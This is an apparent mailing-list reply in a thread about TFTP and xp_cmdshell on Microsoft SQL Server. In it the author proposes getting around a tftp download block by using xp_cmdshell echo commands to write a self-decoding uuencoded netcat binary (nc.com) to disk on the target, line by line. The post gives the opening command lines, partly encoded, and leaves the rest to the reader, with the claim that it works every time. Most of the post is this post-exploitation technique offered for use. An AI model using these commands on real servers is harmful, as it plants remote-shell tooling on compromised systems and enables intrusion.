Re: TFTP and XP_CMDSHELL - Weird

[Javier Fernandez-Sanguino <jfernandez () germinus com>]

Andres Molinetti wrote:

> I think the problem is the tftp client. Does anyone know if MS has fixed 
> it in anyway not to allow downloads from low-privileged users?? or 
> something like that??

Why use tftp? You can just create an uuencode file that will 
auto-decode itself when run. Try using

xp_cmdshell 'echo begin 666 nc.com >>c:\nc.com'
xp_cmdshell 'echo 
M6%!04%E:25%$6TPM9C8M9S0Q1T136'4G0"Q^4%Y07T\L(2A'52A'6BA';G4U 
>>c:\nc.com'
xp_cmdshell 'echo 
M+4Y%5%-%3D1?5C$N,#!?2E)4/0T*0T9&1E)8+&`L8#(D1CU`(70N<E$P)4EU >>c:\nc.com'
(...)

and so on. I'll leave the rest up to you. There are some caveats when 
you want to pull that through HTTP but it works everytime.

Regards

Javier